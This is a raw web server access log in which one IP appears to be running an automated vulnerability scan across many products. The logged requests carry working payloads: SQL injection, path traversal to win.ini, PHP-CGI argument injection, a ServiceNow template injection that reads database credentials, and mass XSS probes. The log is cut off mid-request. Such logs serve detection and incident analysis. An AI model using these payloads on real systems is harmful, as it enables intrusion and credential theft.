195.164.49.69 - - [20/Oct/2024:17:16:52 +0000] POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 404 1218
195.164.49.69 - - [20/Oct/2024:17:16:53 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:17:17:25 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:17:17:26 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:17:17:26 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:17:17:26 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
83.212.98.101 - - [20/Oct/2024:17:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:17:39 +0000] POST /wsman HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:17:18:02 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:18:02 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:18:03 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:18:04 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:19:05 +0000] POST /v1/backend1 HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:17:19:06 +0000] GET /v1/2ni6kBwVtg6D9Ty73jIrPGYX5Gm.php HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:17:19:27 +0000] GET /client/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:19:30 +0000] GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:19:31 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:19:33 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:19:34 +0000] GET /OA_CGI/FNDWRR.exe HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:19:35 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:20:21 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:17:20:22 +0000] POST /api/content/ HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:20:23 +0000] GET /2ni6k9A9iOVh3iLExRZ344K1GLI.jsp HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:20:24 +0000] POST /fileupload/toolsAny HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:17:20:25 +0000] GET /authenticationendpoint/2ni6kegpevhvwt5vdd3ulnos1ra.jsp HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:17:20:34 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:17:20:35 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:20:37 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:20:38 +0000] POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:17:20:38 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:20:39 +0000] POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:17:20:40 +0000] GET /api/v2/cmdb/system/admin HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:17:20:41 +0000] PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:17:20:43 +0000] POST /aspera/faspex/package_relay/relay_package HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:17:20:44 +0000] POST /goanywhere/lic/accept HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:20:45 +0000] POST /index.php?c=blocked&action=continue HTTP/1.1 404 1083
83.212.98.101 - - [20/Oct/2024:17:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:20:48 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:17:20:49 +0000] GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2ni6kCScGTfPK6Y1KRSXmaNe1qL HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:17:20:50 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:17:20:50 +0000] POST /setup/setupadministrator.action HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:17:20:51 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:17:20:52 +0000] GET /welcome.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:17:20:55 +0000] POST /api/2.0/mlflow/registered-models/create HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:17:20:56 +0000] POST /api/2.0/mlflow/model-versions/create HTTP/1.1 404 1126
83.212.98.101 - - [20/Oct/2024:17:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:24:55 +0000] GET /app?service=page/SetupCompleted HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:24:56 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:24:57 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:24:58 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:24:59 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:25:00 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:25:01 +0000] GET /app?service=page/PrinterList HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:25:16 +0000] DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:17:25:17 +0000] POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:17:25:18 +0000] GET /WebInterface HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:17:25:19 +0000] GET /api/server/version HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:17:25:32 +0000] POST /webtools/control/xmlrpc?USERNAME&PASSWORD=2ni6kCbOmvIH9XGcrbhKFGrWqDo&requirePasswordChange=Y HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:25:33 +0000] GET /api/clusters HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:17:25:36 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:17:25:37 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:25:38 +0000] GET /xyz/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:17:25:41 +0000] POST /dana-na/auth/saml-sso.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:25:43 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:17:25:45 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
83.212.98.101 - - [20/Oct/2024:17:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:25:45 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
- - - [20/Oct/2024:17:25:46 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:17:25:49 +0000] GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:17:25:51 +0000] GET /en-US/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:17:25:53 +0000] POST /Startup/Register HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:25:54 +0000] POST /Token HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:17:26:05 +0000] POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:17:26:06 +0000] POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:26:07 +0000] POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:17:26:08 +0000] POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:17:26:10 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:17:26:11 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:17:26:12 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:17:26:13 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:17:26:14 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:26:25 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:26:26 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:26:26 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:26:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:33 +0000] GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:36 +0000] GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:36 +0000] GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:36 +0000] GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:36 +0000] GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:36 +0000] GET /?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:36 +0000] GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:41 +0000] GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:50 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:50 +0000] GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:50 +0000] GET /?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm